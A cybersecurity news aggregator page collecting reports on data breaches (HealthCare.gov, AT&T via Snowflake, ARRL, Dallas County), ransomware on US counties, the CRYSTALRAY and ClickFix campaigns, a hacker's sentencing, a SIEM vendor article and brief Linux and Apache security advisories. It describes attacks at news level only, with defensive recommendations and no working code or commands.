Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for US Health Insurance ...

 Cybersecurity News

HealthCare.gov, the health insurance exchange website operated by the United States federal government, has reportedly suffered a data breach. A threat actor has reportedly orchestrated the HealthCare.gov data breach and claimed to have leaked database from the website on dark web which contains sensitive information   show more ...

of approximately 7,500 users. The claim that HealthCare.gov had been compromised surfaced on July 11 on the data leak site BreachForums. The threat actor claimed that they were revealing the stolen database of 83,000 lines, which consists of the Personally Identifiable Information (PII) of 7,500 users, including their full names, phone numbers, email addresses, mailing addresses, cities, states and zip codes. To substantiate the data breach claim, the threat actor, operating under the alias “HealthDontCare”, attached sample records in zip format. In its claim, the bad actor wrote in the post, “Today we are uploading healthcare.gov database breached today. We have exploited several vulnerabilities to gain access to this data. N***ers from United States failed to pay our extortion fee, so f**k off and enjoy.” Potential Impact of HealthCare.gov Data Breach If proven, the potential consequences of this cyberattack could be critical as personal information about citizens could be exposed. The organization should take appropriate measures to protect the privacy and security of the stakeholders involved. Data breaches of this nature can lead to identity theft, potential financial frauds, and a loss of trust among citizens. Currently, details regarding the extent of the HealthCare.gov Data Breach, the extent of data compromised, and the motive behind the cyber assault remain undisclosed. Despite the claims made by the threat actor, the official HealthCare.gov website remain fully functional. This discrepancy has raised doubts about the authenticity of the threat actor’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to the officials of Centers for Medicare & Medicaid Services (CMS). As of the writing of this news report, no response has been received, leaving the cyberattack claim unverified. HealthCare.gov Suffered Two Cyberattacks Previously This is not the first time that HealthCare.Gov was under the scanner for data breaches. The CMS reported that sensitive data of 93,689 people was compromised during an October 16, 2018 data breach of HealthCare.Gov that targeted the Direct Enrollment pathway used by insurance agents and brokers. Initially the numbers of victims were estimated at 75,000. According to an article by CNBC, the data breach in 2018 exposed personal details of victims including the last four digits of the Social Security number, immigration status and employer name. The exposed data consisted of information provided on insurance applications, as well as information from other federal agencies used to confirm the application details. The breach forced CMS to shut down the Direct Enrollment pathway for a week while investigating the suspicious activity it noticed on the portal. Owing to the breach, the CMS reached out to all affected consumers by phone and mailed notification letters to offer free credit protection and additional services to prevent and remediate issues arising from unauthorized use of data exposed as a result of the breach, including identity monitoring services, identity theft insurance, and identity restoration services. In 2014 too, hackers had uploaded malware to a test server of HealthCare.gov. However the CMS then put out a statement that, “Our review indicates that the server did not contain consumer personal information; data was not transmitted outside the agency, and the website was not specifically targeted. We have taken measures to further strengthen security." Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Ukrainian Cybercrime ...

 Cybersecurity News

Vyacheslav Igorevich Penchukov, a Ukrainian hacker known as "Tank" has been sentenced to two concurrent 9-year prison terms by a U.S. federal court in Lincoln, Nebraska. for his role in a prolific cybercrime gang that stole tens of millions of dollars from small businesses. The 38 year-old individual, pleaded   show more ...

guilty to two charges of conspiracy to participate in racketeering and conspiracy to commit wire fraud. Judge John M. Gerrard sentenced also ordered him to pay more than $73 million in restitution and forfeited funds for these crimes. 'Tank' and JabberZeus Crew Penchukov admitted to leading the Jabber Zeus hacking group, which used sophisticated malware to steal bank account information from small U.S. and European businesses. The group's operations, which began in 2009, resulted in tens of millions of dollars in losses. The FBI had been pursuing Penchukov for over a decade, and his capture in Switzerland in 2022 brought an end to his criminal spree. While leading the Jabber Zeus hacking cew, 'Tank' used the Zeus malware to infect computers and steal bank account information. He also organized the IcedID malware, which collected financial details and allowed ransomware to be deployed on systems. Investigators found a spreadsheet detailing the $19.9 million income IcedID made in 2021. The University of Vermont Medical Center was among the prominent victims of the IcedID malware, losing of over $30 million in the attack and rendering many of the critical patient services within the the institute as unavailable for more than two weeks. Penchukov had been charged in association with the attack by the law enforcement of the Eastern District of North Carolina. In response to the incident, U.S. Attorney Michael Easley for the Eastern District of North Carolina stated, “Malware like IcedID bleeds billions from the American economy and puts our critical infrastructure and national security at risk.” Last September, Dr. Stephen Leffler, President of the University of Vermont Medical Center had testified to the House of Representatives that the center was unable to access its own medical records for 28 days due to the incident. Dr. Leffler stated, “We didn’t have internet.” He added. "We didn’t have phones. It impacted radiology imaging, laboratory results." According to Dr. Leffler's testimony, the medical center's staff had rushed to purchase walkie-talkies to keep services running. Penchukov appeared on the FBI's most wanted cyber list for over a decade as the recognized leader of the cybercrime gang. Earlier, prosecutors had stated in court, “The defendant played a crucial role, a leadership role, in this scheme by directing and coordinating the exchange of stolen banking credentials and money mules." Jim Craig, a former FBI special agent who led the 2009 investigation into the Zeus cybercriminal group, expressed satisfaction with the outcome. Craig stated, "I never thought that we would ever see any of Jabber Zeus crew face justice in the U.S." Besides his involvement in cybercrime, Penchukov had also been identified as a popular DJ, who operated within Ukraine under the moniker of 'DJ Slava Rich.' Implications of Ruling The prosecution of Penchukov represents a significant milestone in the fight against high-value cybercrime targets and the persistence of law enforcements against international jurisdictional challenges. The Western law enforcement authorities are known to face challenges in prosecuting Eastern European cybercriminals, particularly those operating out of Russia or Ukraine, which do not have official extradition agreements with the US government. Craig pointed out, "The significance of him being caught is important to show that law enforcement is not going to stop—wherever they go, there's going to be a chance and opportunity for them to get caught." The case also raises questions about potential cooperation between Penchukov and authorities to aid ongoing cybercrime investigations, according to court documents both Penchukov's own lawyer and the US government requested less severe sentences after he had pleaded guilty to two charges of conspiring to participate in racketeering and commitment of wire fraud. Several charges were dropped against Penchukov following his signing of a plea agreement of which the details are publicly unknown.

image for U.S. Counties Reelin ...

 Ransomware News

Several counties in the United States are facing the wrath of ransomware - with one confirming hundreds of thousands were impacted in a late 2023 attack and the other declaring an attack from earlier this week as a “local disaster.” Last year, 95 ransomware attacks on local governments were reported, according to   show more ...

Emsisoft. There have already been more than 50 reported attacks on cities and counties this year with the most prominent ones being Washington, Miami, Fulton, Kershaw, Hidalgo, Gallup-Mckinsley, and Los Angeles. Dallas County October Ransomware Attack Exposed Data of 200,000 People In October 2023, the Play ransomware gang claimed to have stolen data during an attack on Dallas County systems. The county publicly acknowledged the incident and assured the public that they successfully contained the damage caused in the incident. “Due to our containment measures, Dallas County interrupted data exfiltration from its environment and effectively prevented any encryption of its files or systems,” the county said, at the time. However, it also said that it was in process of assessing the nature of the exposed information when Play published it. As the review process was extensive, Dallas County provided details of the actual impact only on Wednesday in a filing with the Maine Attorney General and sent data breach notices to 201,404 impacted individuals. The types of data confirmed to have been exposed could contain full name, Social Security number (SSN), dates of birth, driver's license, state identification number, taxpayer identification number, medical information, and Health insurance information. There are several reasons as to why the Dallas County might hold such sensitive information. It said, “You could be a resident, an employee, or you might have received services from or interacted with one of our agencies (e.g., Department of Health and Human Services). Additionally, the County participates in data sharing agreements with other organizations to enhance the services we offer to our residents and the public.” Ransomware Attack Forced Indiana County to File a Local Disaster Declaration Clay County, Indiana, a rural community of roughly 25,000 residents, declared a local disaster Thursday after a ransomware attack crippled critical government services. The attack, discovered early Tuesday morning, rendered county data inaccessible and severed electronic connections with state partners hindering essential operations at the Clay County Courthouse, Community Corrections, and Clay County Probation. "We cannot access our data or electronically connect with some of the state partners we work with for many of our tasks," Clay County commissioners revealed in a local press conference. County officials immediately contacted local and federal law enforcement to investigate the incident. The Clay County Courthouse and Health Department remained shuttered throughout Tuesday and Wednesday. While the 911 system remained operational, non-emergency lines experienced temporary disruptions that have since been rectified. As of Thursday afternoon, the Clay County website is also unavailable. This incident comes on the heels of a similar attack on neighboring Monroe County, Indiana. Earlier this week, Monroe County commissioners confirmed that the BlackSuit ransomware gang targeted their systems, potentially compromising personal information of its 140,000 residents. [caption id="attachment_81405" align="aligncenter" width="940"] Source: Monroe County Board of Commissioners[/caption] BlackSuit is a rebranded version of the Royal ransomware group also responsible for a crippling attack on the Dallas city government last year. The group recently targeted Cedar Falls, Iowa. However, city officials there were able to thwart the attack before significant damage occurred. Cedar Falls officials reported the incident to the FBI and assured residents that city services remained unaffected. BlackSuit claimed to have stolen employee data and county business information during the attack. This recent string of attacks underscores the growing threat posed by ransomware gangs, particularly to smaller municipalities with potentially less robust cybersecurity defenses. The Clay County and Monroe County incident highlights the critical need for local governments to prioritize cybersecurity preparedness and invest in robust incident response plans to minimize disruption and safeguard sensitive data.

image for CRYSTALRAY Group Sca ...

 Cybersecurity News

A threat actor group dubbed 'CRYSTALRAY' has dramatically scaled up its attack operations, targeting over 1,500 victims worldwide with a sophisticated arsenal of open-source security tools. Researchers first observed the group's activities in in February 2024 and have been observing its evolving tactics.   show more ...

The group's primary goals appear to be credential theft, cryptomining and maintaining persistent long-term access to compromised systems. The group's tactics reflect a concerning trend of weaponization of legitimate open-source security tools by threat actor groups for malicious intent and illicit  financial gain. CRYSTALRAY Reconnaissance and Initial Access Researchers from Sysdig observed that the group had significantly scaled up its operations, to target over targeting over 1,500 victims with the abuse of a wide range of legitimate open-source security tools to exploit known vulnerabilities and deploy backdoors. CRYSTALRAY's attack chain begins with careful reconnaissance of potential victims, the group uses tools from ProjectDiscovery, an open-source organization, to identify targets. CRYSTALRAY's arsenal of tools includes zmap, asn, httpx, nuclei, platypus, and SSH-Snake. To gain initial access, the group often modifies existing proof-of-concept exploits for known vulnerabilities, testing them before deployment against real-world targets. These operations tend to focus on specific countries, with the United States and China accounting for over half of their observed victims. [caption id="attachment_81431" align="alignnone" width="1999"] Chart of targeted countries (Source: sysdig.com)[/caption] The attackers employ a tool called "ASN" to generate lists of specific IP addresses for targeted countries. They then use "zmap," a network scanner, to probe these IPs for vulnerabilities ripe for exploit in commonly-used platforms such as Confluence, Weblogic and ActiveMQ. The httpx module is used to verify the presence of vulnerable running services with a httpx_output.txt file generated to filter invalid results. Nuclei is then used to perform vulnerability scans, identifying CVEs such as CVE-2022-44877 (Arbitrary command execution flaw), CVE-2021-3129(Another Arbitrary code execution flaw), and CVE-2019-18394 (Server-side request forgery). Lateral Movement, Data Theft and Crypto-Mining After breaching a system, CRYSTALRAY focuses on lateral movement and data collection. A key tool in their arsenal is SSH-Snake, an open-source worm that spreads through networks using stolen SSH credentials. [caption id="attachment_81432" align="alignnone" width="1999"] Source: sysdig.com[/caption] The group moves beyond server access and compromise, to search for credentials such as passwords or API keys of popular cloud providers stored as environment variables in files such as .env configurations, potentially allowing them to expand their reach into victims' cloud infrastructure. The group automates the SSH-Snake tool to extract and exfiltrate credential data back to attacker-ownerd command-and-control servers. Ultimately, the group deploys cryptominers on breached systems by hijacking the host's processing power, with a script killing any existing cryptominers to maximize profit. While the researchers traced these deployed mining workers to a specific pool and discovered they were making roughly $200/month, starting in April, the group switched to a new configuration, making it impossible for the researchers to determine its current revenue. Researchers have offered the following recommendations to protect against these attacks:  Reduce potential cloud attack surface through secure vulnerability, identity, and secrets management to prevent automated attacks. Organizations required to expose applications to the public Internet, may face additional vulnerabilities and therefore should  prioritize vulnerability remediation to reduce their risk of exposure  Cameras/runtime detections that enable organizations to detect successful attacks and take immediate remediate action, allowing for in-depth forensic analysis to determine root cause of attacks. The scale and sophistication of CRYSTALRAY's operations highlight the growing threat posed by cybercriminals leveraging open-source security tools.

image for ClickFix Malware Del ...

 Cybersecurity News

Researchers have uncovered a malware delivery method dubbed "ClickFix," which exploits user trust through compromised websites to deliver DakGate and Lumma Stealer malware variants. The ClickFix technique uses social engineering to trick users into executing malicious scripts, potentially leading to severe   show more ...

system compromise of affected systems. These sites redirect visitors to domains hosting fake popup windows, which instruct users to paste a script into a PowerShell terminal. ClickFix Social Engineering Infection Chain After visitors are redirected from seemingly-legitimate sites, instructions are displayed to deceive them into pasting various base64-encoded commands into a PowerShell terminal. Researchers from McAfee Labs stated that these commands are designed to download and execute malware, from remote attacker-controlled C2 servers. [caption id="attachment_81515" align="aligncenter" width="471"] Prevalence over past three months (Source: mcafee.com)[/caption] The ClickFix social engineering technique showcases a highly effective and technical method for malware deployment. Once the malware is active on the system, the malware typically includes steps to evade security detections such as clearing clipboard contents and running processes on minimized windows, maintain persistence on victim's systems, and stealing users’ personal data to send to a command and control (C2) server. The researchers have detailed the use of the ClickFix technique by the DarkGate and Lumma Stealer malware: DarkGate DarkGate is a malware family that relies on the ClickFix technique. The DarkGate malware is distributed through phishing emails that contain HTML attachments masqueraded as MS Office Word document files. After a user accesses the attachment, the HTML file displays a "How to fix" button, that upon clicking displays base64-encoded commands which hide malicious PowerShell instructions. [caption id="attachment_81519" align="aligncenter" width="626"] Source: mcafee.com[/caption] Upon running, the PowerShell commands downloads and executes an additional HTA file that contains additional malicious payloads. Once infected, the malware is capable of exfiltrating sensitive information and providing unauthorized remote access to threat actors. Lumma Stealer [caption id="attachment_81520" align="aligncenter" width="581"] Source: mcafee.com[/caption] While the Lumma Stealer is distributed through similar use of the ClickFix technique, visitors are usually greeted directly with a webpage displaying error message such as supposed browser problems, and are apparently provided instructions to 'fix' the issue. These instructions trick users to similarly enter base64-encoded commands into a PowerShell terminal that run the Lumma Stealer malware upon execution. This allows the stealer to bypass traditional security measures while compromising affected systems. Mitigations and Remediations To protect against the ClickFix technique and malware such as DarkGate and Lumma stealer, the researchers have shared the following recommendations: Regular training to inform potential victims about about social engineering tactics or phishing campaigns. Use of antivirus software on system endpoints. Implementation of a robust email or website filtering system to block suspicious phishing mails, malicious attachments or malicious websites. Deployment of firewalls and intrusion detection/prevention systems (IDS/IPS) to block against  malicious traffic on networks. Network segmentation to prevent the spread of malware within organizations. Monitoring of network logs and traffic Enforcement of the principle of least privilege (PoLP). Implementation of security policies or monitoring over clipboard content, particularly in sensitive environments. Implementation of multi-factor authentication (MFA). Update operating systems, software, and applications to the latest available patched versions. Encrypt stored data or data in transmission from potential unauthorized access. Regular and secure back up of important data

image for Massive AT&T Data Br ...

 Data Breach News

AT&T disclosed a massive data breach today that impacts "nearly all" its customers call and text records. The hackers gained unauthorized access to a third-party cloud platform containing this data, which an AT&T spokesperson confirmed to be Snowflake to The Cyber Express. The incident, discovered in   show more ...

April, impacts a vast swathe of AT&T's mobile and landline customers, raising concerns about potential identity theft and targeted attacks. However, a spokesperson for AT&T told The Cyber Express: "This was aggregated metadata, not the content of calls or texts, nor was it social security numbers or credit card information. This incident took place outside of our network. Our systems were not breached." According to AT&T, the compromised data spans May 1 to October 31, 2022, for most customers, with a limited number affected from January 2nd, 2023. While the data doesn't include call and text content, Social Security numbers, or other personally identifiable information (PII), it does contain phone numbers and, for some records, cellular site location details. "Based on our investigation, the compromised data includes files containing AT&T records of calls and texts of nearly all of AT&T's cellular customers, customers of mobile virtual network operators (MVNOs) using AT&T's wireless network, as well as AT&T's landline customers who interacted with those cellular numbers." The phone numbers, coupled with publicly available online tools, can be used to identify individuals, AT&T warned. Though the telecom giant assures the data isn't publicly available currently, the potential for future exposure remains a significant risk. AT&T Data Breach Tied to Larger Snowflake Breach Details regarding the attackers or their motivations are not yet clear, however, an AT&T spokesperson told TCE the access point for the breach was through cloud platform Snowflake. Snowflake is currently at the center of probably the biggest and most high profile breaches, including Ticketmaster, Santander, Advanced Auto Parts, Pure Storage, and Neiman Marcus, among others. In June, cybersecurity company Mandiant said it had found 165 of Snowflake customers’ credentials exposed by infostealer malware since 2020. Infostealers typically harvest credentials from infected machines, including usernames and passwords but also authentication tokens and cookies. Many of these credentials are then put out for sale on dark web forums from a few tens to thousands of dollars. Snowflake did not immediately respond for comment request but in May the company’s CISO Brad Jones had said, “We have not identified evidence suggesting this activity was caused by a vulnerability, misconfiguration, or breach of Snowflake’s platform,” attributing the breaches to poor credential hygiene in customer accounts instead. Since then, Snowflake has taken several measures to refine it security posture including the establishment of a Trust Center and enabling Snowflake admins to make multifactor authentication (MFA) mandatory. One Arrested in Relation to the AT&T Data Breach The telecom giant has enlisted cybersecurity experts to investigate the intrusion and partnered with law enforcement, the company confirmed in an 8-K filing with the U.S. Securities and Exchange Commission. "AT&T is working with law enforcement in its efforts to arrest those involved in the incident. Based on information available to AT&T, it understands that at least one person has been apprehended." AT&T plans to notify impacted customers and offer resources to safeguard their information. This incident underscores the critical need for robust cloud security measures and highlights the expanding threat landscape for the telecommunication industry. The lack of call content or PII might be a saving grace, but the potential for identity theft and targeted attacks using phone numbers persists. Security professionals will be keenly interested in learning more about the attack methodology and the specific cloud platform vulnerability exploited.

image for ARRL Confirms Data B ...

 Cybersecurity News

Amateur radio community, American Radio Relay League (ARRL), which reported that it was the target of a significant ransomware attack in May 2024, has now confirmed that data of few of its employees was stolen in the cyberattack. The ARRL data breach notification was recently shared with impacted individuals which   show more ...

mentioned that a "sophisticated ransomware incident" was detected after the attackers breached and encrypted its computer systems on May 14. ARRL Data Breach: What Was Affected? ARRL is the preeminent national association for amateur radio enthusiasts in the United States. In its data breach notification on May 20, ARRL mentioned that the attackers compromised data from “Logbook of The World” (LoTW) internet database. This platform is crucial for amateur radio operators, allowing them to record and verify successful contacts (QSOs) with fellow operators globally. The LoTW’s functionality as a digital logbook and a user confirmation system is central to the operations of many enthusiasts who rely on its integrity for maintaining accurate records. Following this attack, ARRL said, “We immediately took the affected systems offline, secured our network environment and engaged independent third-party forensic specialists to assist us with investigating the extent of any unauthorized activity. “Our investigation has determined that the unauthorized third party may have acquired your personal information during this incident. Please know that we have taken all reasonable steps to prevent your data from being further published or distributed, have notified and are working with federal law enforcement to investigate.” ARRL Data Breach Only Affected 150 Members: SEC Filing ARRL, in its SEC filing with the Office of Maine's Attorney General this week, claimed that the data breach in May only affected 150 employees. In its notice to impacted individuals recently, ARRL wrote, “While we have no evidence that your information has been misused, we are notifying you of this incident and are offering you the resources provided in this letter, in an abundance of caution and so that you can take precautionary steps to help protect yourself, should you wish to do so. ARRL recommends you proceed with caution and take advantage of the resources provided in this letter.” The community decided to provide those impacted by this data breach with 24 months of free identity monitoring. “We value the safety of your personal information and want to make sure you have the information you need so that you can take steps to further protect yourself, should you feel it appropriate to do so. We encourage you to remain vigilant and to regularly review and monitor relevant account statements and credit reports and report suspected incidents of identity theft to local law enforcement, your state’s Attorney General or the Federal Trade Commission (the “FTC”). “To help relieve concerns and restore confidence following this incident, we have secured the services of Kroll to provide identity monitoring at no cost to you for 24 months. Kroll is a global leader in risk mitigation and response, and their team has extensive experience helping people who have sustained unintentional exposure of confidential data. Your identity monitoring services include Credit Monitoring, $1 Million Identity Fraud Loss Reimbursement, Fraud Consultation, and Identity Theft Restoration,” the company said in a statement. Even though the community has so far released two public statements regarding the data breach, ARRL has not linked the ransomware attack to a specific threat actor. This incident also serves as a reminder of the vulnerabilities inherent in digital transformation. As organizations increasingly rely on online platforms for critical services, enhanced cybersecurity measures become indispensable. The ARRL’s experience could prompt other associations and similar entities to re-evaluate their cybersecurity postures and adopt more stringent safeguards.

image for SIEM benefits for me ...

 Business

A medium-sized company is an attractive target for cybercriminals. It operates on a scale thats large enough for the company to pay a substantial ransom if its data is taken hostage. Meanwhile, its approach to information security is often an inheritance from the time when it was much smaller. Hackers can come up with   show more ...

a tactic to bypass the companys basic protection and compromise the network with little to no resistance. The damage done by such incidents averages around $100,000. The regulatory side of things also cannot be ignored: cybersecurity rules and regulations have been proliferating around the world, and so have the fines for non-compliance. Businesses are often cognizant of these threats and willing to allocate more resources to their infosec teams. How do you take your corporate security to the next level without excessive outlay? Heres a little spoiler: deploying a SIEM (Security Information and Event Management) system is key. Layered protection A companys long-term goal should be to build layered defenses in which different tools and controls complement one another to significantly complicate attacks on the company and limit the attackers options. A company with 500 to 3000 employees is almost certain to have the basic tools and the initial protective layer: access control through authentication and authorization, endpoint protection (popularly known as antivirus), server protection including email servers, and a firewall. The next thing to do is supplement, rather than replace, this arsenal with more advanced cybersecurity tools, such as: A system for comprehensive monitoring and correlation of security events from a variety of data sources (computers, servers, and applications) in real time across the entire infrastructure Tools for obtaining enhanced information about possible incidents or just suspicious activity and anomalies Incident response tools: from investigations in accordance with regulatory requirements, to isolation of compromised hosts and accounts, vulnerability elimination, and so on Advanced identity management tools: from centralized user management and role-based access control, to a single authentication portal with MFA Tools for improving visibility and manageability of IT assets, attack surface management, and patch management Having all of these at the same time is out of the question, so implementing these measures will need to be prioritized and broken down into phases. That said, comprehensive monitoring forms the basis for many other information security tools, and therefore, SIEM implementation should be close to the top of the list. This equips defenders with brand new capabilities: detecting attackers malware-free activities, spotting both suspicious objects and suspicious behavior, and visualizing and prioritizing infrastructure events. Proper use of SIEM can relieve the workload on the infosec team, as it spares them the need to spend time handling isolated events, logs, and other artifacts manually. What a SIEM system is and why a medium-sized company needs one SIEM solutions have been used for comprehensive IT monitoring in corporate infrastructures for two decades now. These solutions are composed of a number of components that collect, store, organize, and analyze telemetry, and allow responding to incoming events. Thanks to SIEM, an infosec employee can receive most alerts in a single console, easily link different aspects of an event (such as file creation, network activity, and account login) into a single entity without having to dig through five different data sources, and respond promptly to these events. The high degree of automation saves the infosec team a great deal of time. What you used to do manually just by walking over to a coworkers computer becomes too much effort as the company grows in size. Key SIEM components for medium-sized businesses The architecture may differ between SIEM systems, but the key elements are always the same: Event sources: these arent part of the SIEM, but they serve as providers of information. Anything that generates logs as it runs – whether its an operating system, EDR agent, business application, or network device – can be a source. Collector: this is typically a separate service that receives logs from telemetry sources for processing in the SIEM. Log normalizer and storage: these are elements of the SIEM platform core. The normalizer transforms and adapts the logs it receives from a collector to make them suitable for use, search, and analysis. Centralized data storage significantly simplifies detection and investigation of incidents, as well as the provision of incident information to regulators. Event correlation is the heart of SIEM systems. This is the key step where disjointed events contained in different logs are correlated, merged if found to be associated with the same activity or different stages of a single activity, and prioritized. Prioritization is driven by threat intelligence available to the defenders. This is what can serve as the basis for writing a rule that wont ping the infosec team every time a PowerShell script runs, but will raise an alert if a script runs with command-line options characteristic of a targeted attack. Dashboards and alerts are a purely visual but important part of the system that helps make sense of heaps of data, easily find what youre looking for, quickly drill down into an incident, and learn about issues or suspicious events in time. A steep price used to be a real barrier to SIEM adoption by medium-sized businesses, as the products were aimed at larger companies exclusively. This has now changed with the advent of new solutions that no longer target just the enterprise segment of the market, such as our Kaspersky Unified Monitoring and Analysis platform.

image for Crooks Steal Phone, ...

 A Little Sunshine

AT&T Corp. disclosed today that a new data breach has exposed phone call and text message records for roughly 110 million people — nearly all of its customers. AT&T said it delayed disclosing the incident in response to “national security and public safety concerns,” noting that some of the   show more ...

records included data that could be used to determine where a call was made or text message sent. AT&T also acknowledged the customer records were exposed in a cloud database that was protected only by a username and password (no multi-factor authentication needed). In a regulatory filing with the U.S. Securities and Exchange Commission today, AT&T said cyber intruders accessed an AT&T workspace on a third-party cloud platform in April, downloading files containing customer call and text interactions between May 1 and October 31, 2022, as well as on January 2, 2023. The company said the stolen data includes records of calls and texts for mobile providers that resell AT&T’s service, but that it does not include the content of calls or texts, Social Security numbers, dates of birth, or any other personally identifiable information. However, the company said a subset of stolen records included information about the location of cellular communications towers closest to the subscriber, data that could be used to determine the approximate location of the customer device initiating or receiving those text messages or phone calls. “While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number,” AT&T allowed. AT&T’s said it learned of the breach on April 19, but delayed disclosing it at the request of federal investigators. The company’s SEC disclosure says at least one individual has been detained by the authorities in connection with the breach. In a written statement shared with KrebsOnSecurity, the FBI confirmed that it asked AT&T to delay notifying affected customers. “Shortly after identifying a potential breach to customer data and before making its materiality decision, AT&T contacted the FBI to report the incident,” the FBI statement reads. “In assessing the nature of the breach, all parties discussed a potential delay to public reporting under Item 1.05(c) of the SEC Rule, due to potential risks to national security and/or public safety. AT&T, FBI, and DOJ worked collaboratively through the first and second delay process, all while sharing key threat intelligence to bolster FBI investigative equities and to assist AT&T’s incident response work.” Techcrunch quoted an AT&T spokesperson saying the customer data was stolen as a result of a still-unfolding data breach involving more than 160 customers of the cloud data provider Snowflake. Earlier this year, malicious hackers figured out that many major companies have uploaded massive amounts of valuable and sensitive customer data to Snowflake servers, all the while protecting those Snowflake accounts with little more than a username and password. Wired reported last month how the hackers behind the Snowflake data thefts purchased stolen Snowflake credentials from dark web services that sell access to usernames, passwords and authentication tokens that are siphoned by information-stealing malware. For its part, Snowflake says it now requires all new customers to use multi-factor authentication. Other companies with millions of customer records stolen from Snowflake servers include Advance Auto Parts, Allstate, Anheuser-Busch, Los Angeles Unified, Mitsubishi, Neiman Marcus, Progressive, Pure Storage, Santander Bank, State Farm, and Ticketmaster. Earlier this year, AT&T reset passwords for millions of customers after the company finally acknowledged a data breach from 2018 involving approximately 7.6 million current AT&T account holders and roughly 65.4 million former account holders. Mark Burnett is an application security architect, consultant and author. Burnett said the only real use for the data stolen in the most recent AT&T breach is to know who is contacting whom and how many times. “The most concerning thing to me about this AT&T breach of ALL customer call and text records is that this isn’t one of their main databases; it is metadata on who is contacting who,” Burnett wrote on Mastodon. “Which makes me wonder what would call logs without timestamps or names have been used for.” It remains unclear why so many major corporations persist in the belief that it is somehow acceptable to store so much sensitive customer data with so few security protections. For example, Advance Auto Parts said the data exposed included full names, Social Security numbers, drivers licenses and government issued ID numbers on 2.3 million people who were former employees or job applicants. That may be because, apart from the class-action lawsuits that invariably ensue after these breaches, there is little holding companies accountable for sloppy security practices. AT&T told the SEC it does not believe this incident is likely to materially impact AT&T’s financial condition or results of operations. AT&T reported revenues of more than $30 billion in its most recent quarter.

 Trends, Reports, Analysis

Ransomware gangs are now creating custom data-stealing malware instead of just encrypting files. Mature crime organizations are investing in bespoke data theft tools, according to a Cisco Talos report on the top 14 ransomware groups.

 Companies to Watch

Cytactic, an Israel-based provider of a platform pioneering cyber crisis readiness and management, raised $16M in a seed funding round led by Evolution Equity Partners. It intends to use the funds to expand operations and development efforts.

 Trends, Reports, Analysis

Compiled V8 JavaScript in Google's engine converts JavaScript into low-level bytecode, making analysis and detection difficult. Attacks using this bytecode ensure compatibility with the V8 engine for successful execution.

 Threat Intel & Info Sharing

The attacks were detected earlier this year, with indicators of compromise shared by AhnLab Security Intelligence Center. The attackers initiate their attacks with phishing emails containing malicious attachments disguised as documents.

 Threat Actors

FIN7, a cybercrime group responsible for billions in losses, was dismantled by U.S. authorities in 2023. However, they resurfaced in 2024 with Stark Industries Solutions, hosting thousands of fake websites mimicking renowned companies.

 Incident Response, Learnings

JAXA was targeted with zero-day exploits during its investigation with Microsoft into a 2023 cyberattack. The attack mainly affected its Active Directory system, prompting JAXA to shut down networks to prevent data compromise.

 Feed

Ubuntu Security Notice 6896-1 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the Atheros 802.11ac wireless   show more ...

driver did not properly validate certain data structures, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service.

 Feed

Debian Linux Security Advisory 5729-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in authentication bypass, execution of scripts in directories not directly reachable by any URL, server-side request forgery or denial of service.

 Feed

Ubuntu Security Notice 6895-1 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the HugeTLB file system   show more ...

component of the Linux Kernel contained a NULL pointer dereference vulnerability. A privileged attacker could possibly use this to to cause a denial of service.

 Feed

Ubuntu Security Notice 6864-3 - It was discovered that the Intel Data Streaming and Intel Analytics Accelerator drivers in the Linux kernel allowed direct access to the devices for unprivileged users and virtual machines. A local attacker could use this to cause a denial of service. A security issue was discovered in the Linux kernel. An attacker could possibly use it to compromise the system.

 Feed

Ubuntu Security Notice 6885-2 - USN-6885-1 fixed vulnerabilities in Apache HTTP Server. One of the security fixes introduced a regression when proxying requests to a HTTP/2 server. This update fixes the problem. Marc Stern discovered that the Apache HTTP Server incorrectly handled serving WebSocket protocol upgrades   show more ...

over HTTP/2 connections. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. Orange Tsai discovered that the Apache HTTP Server mod_proxy module incorrectly sent certain request URLs with incorrect encodings to backends. A remote attacker could possibly use this issue to bypass authentication. Orange Tsai discovered that the Apache HTTP Server mod_rewrite module incorrectly handled certain substitutions. A remote attacker could possibly use this issue to execute scripts in directories not directly reachable by any URL, or cause a denial of service. Some environments may require using the new UnsafeAllow3F flag to handle unsafe substitutions. Orange Tsai discovered that the Apache HTTP Server incorrectly handled certain response headers. A remote attacker could possibly use this issue to obtain sensitive information, execute local scripts, or perform SSRF attacks. Orange Tsai discovered that the Apache HTTP Server mod_proxy module incorrectly handled certain requests. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. It was discovered that the Apache HTTP Server incorrectly handled certain handlers configured via AddType. A remote attacker could possibly use this issue to obtain source code.

 Feed

Ubuntu Security Notice 6893-1 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

 Feed

Ubuntu Security Notice 6894-1 - Muqing Liu and neoni discovered that Apport incorrectly handled detecting if an executable was replaced after a crash. A local attacker could possibly use this issue to execute arbitrary code as the root user. Gerrit Venema discovered that Apport incorrectly handled connections to   show more ...

Apport sockets inside containers. A local attacker could possibly use this issue to connect to arbitrary sockets as the root user.

 Feed

Ubuntu Security Notice 6888-2 - USN-6888-1 fixed several vulnerabilities in Django. This update provides the corresponding update for Ubuntu 18.04 LTS. Elias Myllymäki discovered that Django incorrectly handled certain inputs with a large number of brackets. A remote attacker could possibly use this issue to cause Django to consume resources or stop responding, resulting in a denial of service.

 Feed

Red Hat Security Advisory 2024-4329-03 - Red Hat OpenShift Container Platform release 4.14.32 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a bypass vulnerability.

 Feed

